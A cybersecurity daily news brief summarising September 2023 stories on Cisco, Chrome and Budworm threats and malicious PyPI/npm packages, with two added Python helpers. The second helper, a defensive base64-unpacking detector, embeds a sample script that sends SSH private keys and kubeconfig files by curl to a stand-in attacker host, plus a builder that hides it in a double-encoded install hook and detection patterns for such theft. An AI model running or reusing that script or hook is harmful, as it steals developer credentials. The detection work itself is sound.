Daily Brief

Find articles below, see 'DETAILS' for generated summaries

2023-09-28 18:44:51 bleepingcomputer CYBERCRIME Cisco warns of zero-day vulnerability in IOS software being exploited by attackers
Cisco has issued an advisory for a medium-severity flaw in its IOS and IOS XE software that attackers have attempted to exploit. The vulnerability, tracked as CVE-2023-20109, stems from insufficient attribute validation in the Group Domain of Interpretation (GDOI) and G-IKEv2 protocols of the GET VPN feature. Exploitation requires administrative control of a key server or group member, so an attacker must already have a foothold in the environment; with that access, they could execute arbitrary code and take full control of the affected device, or force it to reload and cause a denial of service (DoS). The flaw affects all Cisco products running a vulnerable IOS or IOS XE release with GDOI or G-IKEv2 enabled. Meraki products and devices running IOS XR or NX-OS are not affected. Despite the high level of access required, Cisco says it has already observed attempted exploitation. In the same batch of advisories, Cisco also fixed a critical flaw in the Security Assertion Markup Language (SAML) APIs of its Catalyst SD-WAN Manager network management software that could let an unauthenticated remote attacker gain unauthorized access to the application.
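Because exposure hinges on whether GET VPN is actually configured, a quick triage step is to scan each device's running-config for GDOI or G-IKEv2 group definitions and note its role (key server vs. group member), since the advisory's precondition is administrative control of one of those. The helper below is an added example, not Cisco's tooling: it parses a constructed running-config snippet. The "crypto gdoi group" block is the standard GET VPN (GDOI) configuration; treating "crypto gkm group" as the G-IKEv2 counterpart is an assumption to verify against your platform's documentation.

```python
"""Triage helper: does an IOS / IOS XE running-config enable GET VPN (GDOI or G-IKEv2)?

Added example, not Cisco's tooling. The sample config below is constructed.
Assumption: 'crypto gkm group' is the G-IKEv2 configuration block (verify per platform).
"""
import re
from dataclasses import dataclass, field

SAMPLE_RUNNING_CONFIG = """\
hostname branch-gm-01
!
crypto gdoi group GETVPN-CORP
 identity number 3333
 server address ipv4 10.10.0.1
 server address ipv4 10.10.0.2
!
crypto gkm group GETVPN-V2
 identity number 4444
 server local
  rekey algorithm aes 256
!
crypto map GETVPN-MAP 10 gdoi
 set group GETVPN-CORP
!
interface GigabitEthernet0/0/1
 crypto map GETVPN-MAP
"""


@dataclass
class GetVpnGroup:
    name: str
    protocol: str            # "GDOI" or "G-IKEv2"
    role: str                # "key-server", "group-member" or "unknown"
    key_servers: list = field(default_factory=list)


def parse_getvpn_groups(config: str) -> list:
    """Return every GET VPN group block found in an IOS-style running-config."""
    groups = []
    current = None
    for line in config.splitlines():
        m = re.match(r"^crypto (gdoi|gkm) group (\S+)", line)
        if m:
            proto = "GDOI" if m.group(1) == "gdoi" else "G-IKEv2"
            current = GetVpnGroup(name=m.group(2), protocol=proto, role="unknown")
            groups.append(current)
            continue
        if current is None:
            continue
        # A non-indented line ('!' or a new top-level command) ends the group block.
        if not line.startswith(" "):
            current = None
            continue
        stripped = line.strip()
        if stripped == "server local":
            current.role = "key-server"          # this device is a key server
        elif stripped.startswith("server address ipv4 "):
            current.role = "group-member"        # this device registers with a key server
            current.key_servers.append(stripped.split()[-1])
    return groups


def getvpn_exposed(config: str) -> bool:
    """True if any GDOI or G-IKEv2 group is configured, i.e. the device is in scope."""
    return bool(parse_getvpn_groups(config))


if __name__ == "__main__":
    for g in parse_getvpn_groups(SAMPLE_RUNNING_CONFIG):
        print(f"{g.protocol:7} group={g.name} role={g.role} key_servers={g.key_servers}")
    print("in scope:", getvpn_exposed(SAMPLE_RUNNING_CONFIG))
```

Run it against configs pulled by your existing config-backup tooling; a device with no group blocks is out of scope for this CVE regardless of software version, while key servers deserve the closest look because compromising one affects every group member that registers with it.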
2023-09-28 18:38:32 theregister MISCELLANEOUS DARPA Tests Prototype for Long-Duration Undersea Drone
DARPA, together with PacMar Technologies and Northrop Grumman, has performed an initial test dip of a prototype unmanned undersea vehicle (UUV). Both companies are building prototypes for DARPA's Manta Ray program, which aims to strengthen the United States' next-generation undersea power projection capabilities. The test sought to gain insight into the vehicle's key systems, validate assumptions and models, and gather data ahead of full-scale at-sea demonstrations. Manta Ray focuses on a vehicle that can operate for extended periods without logistic support or maintenance; DARPA intends these vehicles to harvest energy at relevant operational depths by drawing on ocean wave, current, and thermal energy. Future work on the prototype will include new approaches to mitigating biofouling, corrosion, and other material degradation during long-duration missions.
2023-09-28 18:38:31 bleepingcomputer MALWARE Malware Delivered Through Bing Chat Ads: Threat Actors Abuse Sponsored Links for Malware Distribution
Malicious advertisements promoting fake download sites have been observed inside Microsoft's AI-powered Bing Chat. Bing Chat, launched by Microsoft in 2023 to compete with Google, inserts ads into the conversation to generate revenue, and cybercriminals are now using those ads to distribute malware. Observed lures include fake download sites for popular utilities such as 'Advanced IP Scanner', a tool previously used as bait by RomCom RAT and Somnia ransomware operators. The attackers use hijacked ad accounts belonging to legitimate businesses to create sponsored links that direct users to malware-serving sites. After a check that the visitor is human rather than a security scanner, victims are redirected to a replica of the legitimate site and tricked into downloading a malicious file. The campaign abuses the trust users place in a conversational interface: a link surfaced by the chatbot is more likely to be clicked, judged reliable, and not checked against the real vendor's URL. Although the exact payload has not been identified, similar operations have typically delivered information-stealing malware or remote access trojans used for subsequent account and network compromise.
2023-09-28 18:17:47 bleepingcomputer CYBERCRIME FBI Warns of Accelerated Double Ransomware Attacks
The FBI has reported a new trend in which ransomware affiliates deploy two distinct ransomware variants against the same victim within 48 hours, whereas such dual attacks were previously separated by at least ten days. The combination results in data encryption, data exfiltration, and financial losses from ransom payments. Variants observed in these pairings include AvosLocker, Diamond, Hive, Karakurt, LockBit, Quantum, and Royal, and the back-to-back deployment compounds the harm to targeted organizations. Alongside this trend, ransomware groups have been adding new code to their custom data theft tools, wipers, and malware to evade detection and increase pressure on victims. The FBI recommends maintaining close contact with FBI field offices, applying the mitigations in its recent Private Industry Notification, and thoroughly scanning infrastructure for backdoors and vulnerabilities. Further recommendations include requiring VPN for all remote access, enforcing multi-factor authentication, segmenting networks to isolate critical servers, and running network-wide audits and scans to identify unpatched devices.
2023-09-28 15:16:06 bleepingcomputer CYBERCRIME Five Critical Vulnerabilities Discovered in Cisco Catalyst SD-WAN Manager
Cisco has warned of five new vulnerabilities in its Catalyst SD-WAN Manager products, the most critical of which allows unauthorized remote access. That flaw, CVE-2023-20252, is rated 9.8 out of 10 on the Common Vulnerability Scoring System (CVSS) and stems from a weakness in the Security Assertion Markup Language (SAML) application programming interfaces (APIs): an unauthenticated attacker can send crafted requests to the SAML APIs to obtain an authorization token and gain access to the application, enabling user impersonation, unauthorized access to, modification of, or deletion of data, and service disruption. The remaining flaws are less severe; CVE-2023-20034 is remotely exploitable without authentication, but its impact is limited to access to the Elasticsearch database. The vulnerabilities affect various Catalyst SD-WAN Manager versions; the most urgent, CVE-2023-20252, affects versions 20.9.3.2 and 20.11.1.2. The latest release, Catalyst SD-WAN Manager 20.12, is the recommended upgrade target. Cisco states there are no workarounds, so upgrading to a fixed release is the only remediation. There are currently no reports of active exploitation, but Cisco urges customers to upgrade promptly.
2023-09-28 14:53:52 bleepingcomputer MISCELLANEOUS US Federal Agents Target Security Researcher Over Cryptocurrency Scam Probe
Security researcher Sam Curry was detained by US border officials and questioned by federal agents after his home IP address was linked to a cryptocurrency wallet associated with a phishing scam. He was served a grand jury subpoena and his devices were seized and searched at Dulles International Airport on his return from Japan. The wallet in question was one Curry had investigated in his professional capacity. After several days of engagement and clarification by his lawyer, the subpoena was withdrawn and all data seized from his devices was deleted. Curry is a prominent figure in the security field, known for discovering and reporting flaws in the APIs of major car manufacturers and airline reward programs. His experience is a reminder that being a security researcher does not exempt anyone from law-enforcement scrutiny when their IP address or system fingerprint turns up in infrastructure tied to criminal activity. BleepingComputer reports that its inquiries to DHS, CBP, and IRS CI had received no response at the time of publication.
2023-09-28 13:54:39 bleepingcomputer CYBERCRIME Budworm Hackers Deploy Custom Malware Against Middle Eastern Telecoms and Asian Government Entities
The China-linked espionage group known as Budworm has been observed targeting a telecommunications firm in the Middle East and a government entity in Asia with its custom SysUpdate malware. SysUpdate is a remote access trojan with capabilities including process management, data retrieval, screenshot capture, and command execution. The newest variant of the backdoor was detected in August 2023 and is launched via DLL sideloading, which helps it evade security tools on the host. The attackers also use several publicly available tools for credential dumping, network mapping, and data theft. The activity fits a recurring pattern of telecom companies being targeted by state-sponsored and APT groups. Budworm has been active since 2013, conducting espionage against sectors such as government, technology, and defense. Previous Budworm activity includes attacks on organizations in Germany, on several online gaming and gambling companies, and on multiple ministries in Belgium.
2023-09-28 13:51:04 thehackernews NATION STATE ACTIVITY State-backed Chinese Hacking Group, BlackTech, Targets US and Japanese Companies via Router Exploits
BlackTech, a threat actor linked to the Chinese government, has been exploiting routers to attack US and Japanese companies. The group modifies router firmware and abuses the trust between an organization's international subsidiaries and its headquarters to move from branch networks into corporate networks, with targets concentrated in Japan and the United States. The activity has been documented in a joint advisory from the National Security Agency (NSA), the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Japan National Police Agency (NPA), and the Japan National Center of Incident Readiness and Strategy for Cybersecurity (NISC). Targeted sectors include government and military organizations as well as technology, media, electronics, and telecommunications firms, among others. Active since 2007, BlackTech has conducted covert operations against targets in East Asia and has shown an ability to operate undetected. The group uses a range of backdoors and is known for compromising vulnerable routers, which it uses for pivoting and command-and-control (C&C). Its typical intrusion begins with spear-phishing emails carrying malicious attachments that deploy malware built to steal sensitive data, and it relies on evasion techniques such as stolen code-signing certificates and living-off-the-land (LotL) methods to maintain long-term stealthy access. To counter these threats, organizations are advised to monitor network devices for unauthorized bootloader and firmware image downloads and to detect and investigate anomalous traffic to and from routers.
2023-09-28 11:18:46 theregister DATA BREACH Google Works on Fix as Chatbot Bard's Conversations Indexed in Search Results
Google's Bard chatbot gained the ability to share conversations via unique public links in July, and those links have since been indexed by Google Search, making shared chats readily discoverable. Although a user can delete a shared link, copies have persisted in Google's own search results, and the links are otherwise designed to expire automatically after six months. The shared transcripts are not attached to the sharer's account details, but users may not realize that the content they share can surface in Google Search results. The issue adds to Google's series of earlier privacy controversies, including settlements over biometrics, location data, and tracking claims. Google said it did not intend shared Bard chats to be indexed and is working on blocking them from search.
2023-09-28 11:18:45 thehackernews NATION STATE ACTIVITY China-Linked Budworm Launches Improved Malware Attacks on Asian Government and Middle Eastern Telco
The China-linked threat actor Budworm has launched new attacks against a Middle Eastern telecommunications company and an Asian government using an updated version of its SysUpdate malware. The group, also tracked as APT27, Bronze Union, Emissary Panda, Iron Tiger, Lucky Mouse, and Red Phoenix, has been active since 2013 and focuses on intelligence collection across a range of industries. Its toolset includes the China Chopper web shell, Gh0st RAT, HyperBro, PlugX, SysUpdate, and ZXShell, and it is known to exploit vulnerable internet-facing services for initial access. Trend Micro has documented a Linux version of SysUpdate designed to bypass security controls and resist reverse engineering; its features include screenshot capture, arbitrary process termination, file operations, drive information retrieval, and command execution. Although the malware is feature-rich, Symantec observed only credential harvesting on infected machines, suggesting the activity may have been stopped early in the attack chain. Symantec also noted that Budworm continues to develop SysUpdate to extend its capabilities and evade detection, and that it reused its established tradecraft, including DLL side-loading via legitimate applications seen in earlier campaigns, indicating confidence in tooling that is already known to defenders despite the detection and attribution risk.
2023-09-28 11:18:45 thehackernews CYBERCRIME Limitations of Browser Isolation Highlight Need for Advanced Cybersecurity Approaches
Traditional browser isolation, once regarded as a strong defense against malware and browser exploits, is increasingly seen as insufficient in a software-as-a-service (SaaS)-dominated environment. Its weaknesses include a noticeable impact on browser performance and an inability to address newer web threats such as phishing and malicious extensions. Browser isolation works by executing untrusted web code in a separate environment rather than directly on the endpoint, shielding devices and users from potentially malicious content. As work has shifted into the browser and onto SaaS platforms, the performance cost of that approach on web tools and services has become more pronounced, and evolving web threats have outpaced what isolation can stop, leaving a security gap. The article argues that the next generation of browser security is moving toward secure browser extensions, which integrate with existing browsers, monitor and analyse web page components, and neutralize threats with minimal performance impact.
2023-09-28 04:00:57 theregister NATION STATE ACTIVITY Chinese National Security Minister Rates Fake News and Cyberattacks as Pressing Threats
China's Minister of State Security, Chen Yixin, has identified network security incidents, including the spread of fake news and cyberattacks, as the most significant digital threats facing China. Writing in China Cyberspace, the official magazine of the Cyberspace Administration of China, Chen also identified international competition in cyberspace as a key challenge. He criticized foreign technology alliances that he said aim to exclude China, arguing they are motivated by a desire to monopolize technology leadership rather than by genuine security concerns. Chen acknowledged that China's technological weakness lies in other nations' control over core technologies and that China cannot yet match the quality of offshore technology providers. Cyberattacks on Chinese infrastructure and theft of data from government and scientific research institutions were cited as additional threats to national security. Looking ahead, Chen advocated following party lines, advancing in fields such as quantum computing, and improving IT governance and security to meet these challenges. The comments coincide with China's continued emphasis on strengthening its digital capabilities and tightening controls over online activity.
2023-09-28 03:14:21 thehackernews CYBERCRIME Google Releases Patch for Actively Exploited Zero-Day Vulnerability
Google has rolled out fixes for a high-severity, actively exploited zero-day vulnerability (CVE-2023-5217) in the Chrome browser that could lead to program crashes or arbitrary code execution. The flaw, reported by Clément Lecigne of Google's Threat Analysis Group, is a heap-based buffer overflow in VP8 encoding within libvpx, the open-source video codec library. The bug has reportedly been exploited by a commercial spyware vendor to target high-risk individuals. Its discovery brings the number of Chrome zero-days patched this year to five. Google also issued a new CVE identifier, CVE-2023-5129, for the critical and actively exploited flaw in the libwebp image library; that identifier was later rejected as a duplicate, and the libwebp bug remains tracked under CVE-2023-4863. Users of Chrome and Chromium-based browsers, including Microsoft Edge, Brave, Opera, and Vivaldi, are advised to update to the latest versions to mitigate the threat.
2023-09-27 22:15:44 bleepingcomputer CYBERCRIME Google Patches Actively Exploited Chrome Zero-Day Vulnerability for Fifth Time in 2023
Google has patched CVE-2023-5217, the fifth Chrome zero-day vulnerability exploited in attacks since the start of the year. The fix is rolling out to users worldwide. The high-severity flaw is a heap buffer overflow in the VP8 encoding component of the open-source libvpx video codec library and can lead to application crashes or arbitrary code execution. The bug was reported by Google's Threat Analysis Group (TAG), whose researchers frequently uncover zero-day exploits used in targeted spyware attacks by state-sponsored groups. While Google confirmed that an exploit for CVE-2023-5217 has been used in attacks, it has not disclosed further details about those incidents. By restricting access to bug details until a majority of users have updated, and for longer when the bug lives in a third-party library that other projects depend on and have not yet fixed, Google gives users time to update before attackers can study the fix. Withholding those details reduces the likelihood that threat actors will develop their own exploits and deploy them in real-world attacks.
2023-09-27 21:50:36 bleepingcomputer CYBERCRIME Malicious PyPI and npm Packages Steal SSH Keys and Sensitive User Data
Malicious PyPI and npm packages have been systematically stealing software developers' sensitive data since September 12, 2023. Cybersecurity firm Sonatype first identified the campaign through 14 malicious packages on npm, and Phylum later reported that it had expanded to the PyPI ecosystem. To date, the attackers have run roughly seven waves and uploaded 45 malicious packages across npm and PyPI, with the PyPI packages iterating rapidly for better stealth and more specific targeting. Middle and later stages of the campaign introduced more complex collection mechanisms, such as retrieving and executing a data-collecting bash script from an external domain and wrapping the payload in base64, and later double base64, encoding to hinder analysis. Stolen data includes the hostname, username, current path, operating system version, external and internal IP addresses, and, for the PyPI packages, the Python version, as well as Kubernetes configuration files and SSH private keys. That data can expose developer identities, give attackers access to systems, and enable them to modify deployments, add malicious containers, or stage ransomware attacks. Users of PyPI and npm are urged to exercise caution when installing and running packages given the constant influx of malware into both registries.
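The layered base64 wrapping described above is cheap for an attacker and cheap to undo in review: decode repeatedly until the result stops being valid base64, then scan the innermost layer for the things this campaign collects. The helper below is an added example written for this page, not Sonatype's or Phylum's tooling. It builds a constructed install hook that double-base64-encodes a constructed collector script (the exfiltration host uses the reserved .invalid TLD, and the script is never executed), then peels the layers and reports the indicators it finds.

```python
"""Peel nested base64 from a package install hook and flag credential-theft indicators.

Added example, not the registries' or the researchers' own tooling. The collector
script and the install hook below are constructed stand-ins for analysis only.
"""
import base64
import binascii
import re

# Constructed stage-2 collector modelled on the campaign's data targets.
# 'attacker.invalid' is a reserved, non-routable name (RFC 2606). Never executed here.
EXFIL_SCRIPT = """\
#!/bin/bash
H=$(hostname); U=$(whoami); P=$(pwd); V=$(python3 --version 2>&1)
K=$(cat ~/.ssh/id_rsa 2>/dev/null | base64 -w0)
C=$(cat ~/.kube/config 2>/dev/null | base64 -w0)
curl -s -X POST -d "h=$H&u=$U&p=$P&v=$V&k=$K&c=$C" http://attacker.invalid/collect
"""

# Indicators drawn from what the campaign was reported to steal or do.
INDICATORS = {
    "ssh-private-key": re.compile(r"\.ssh/id_(rsa|ed25519|ecdsa)"),
    "kubeconfig": re.compile(r"\.kube/config|\bKUBECONFIG\b"),
    "remote-fetch-and-run": re.compile(r"(curl|wget)[^\n|]*\|\s*(ba)?sh\b"),
    "exfil-post": re.compile(r"curl[^\n]*(-d|--data|-F)\s"),
    "host-fingerprint": re.compile(r"\b(hostname|whoami|uname -a)\b"),
}

# Long runs of base64 alphabet characters are candidate encoded blobs.
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")


def build_double_encoded_hook(script: str) -> str:
    """Construct an install hook of the kind seen in the campaign (hypothetical shape)."""
    inner = base64.b64encode(script.encode()).decode()
    outer = base64.b64encode(inner.encode()).decode()
    return (
        "import base64, subprocess\n"
        f"_p = base64.b64decode(base64.b64decode('{outer}')).decode()\n"
        "subprocess.run(['bash', '-c', _p])\n"
    )


def peel_base64(blob: str, max_layers: int = 8) -> list:
    """Decode repeatedly; stop when the data is no longer strict base64 (or at max_layers)."""
    layers = []
    data = blob.encode()
    for _ in range(max_layers):
        try:
            decoded = base64.b64decode(data, validate=True)
        except (binascii.Error, ValueError):
            break
        if not decoded:
            break
        layers.append(decoded)
        data = decoded
    return layers


def scan_indicators(text: str) -> set:
    """Names of every indicator pattern that matches the decoded text."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def analyze_install_hook(source: str) -> dict:
    """Find encoded blobs in hook source, peel them, and scan the innermost layer."""
    findings = {"layers": 0, "indicators": set()}
    for m in B64_LITERAL.finditer(source):
        layers = peel_base64(m.group(0))
        if not layers:
            continue
        findings["layers"] = max(findings["layers"], len(layers))
        innermost = layers[-1].decode("utf-8", errors="replace")
        findings["indicators"] |= scan_indicators(innermost)
    high_value = {"ssh-private-key", "kubeconfig", "remote-fetch-and-run"}
    findings["suspicious"] = findings["layers"] >= 2 or bool(findings["indicators"] & high_value)
    return findings


if __name__ == "__main__":
    hook = build_double_encoded_hook(EXFIL_SCRIPT)
    print(analyze_install_hook(hook))
```

Point analyze_install_hook at setup.py, pyproject build hooks, or the package.json install/postinstall scripts of a package before installing it; two or more decode layers is itself a strong signal, since legitimate packaging code rarely needs to hide its own source.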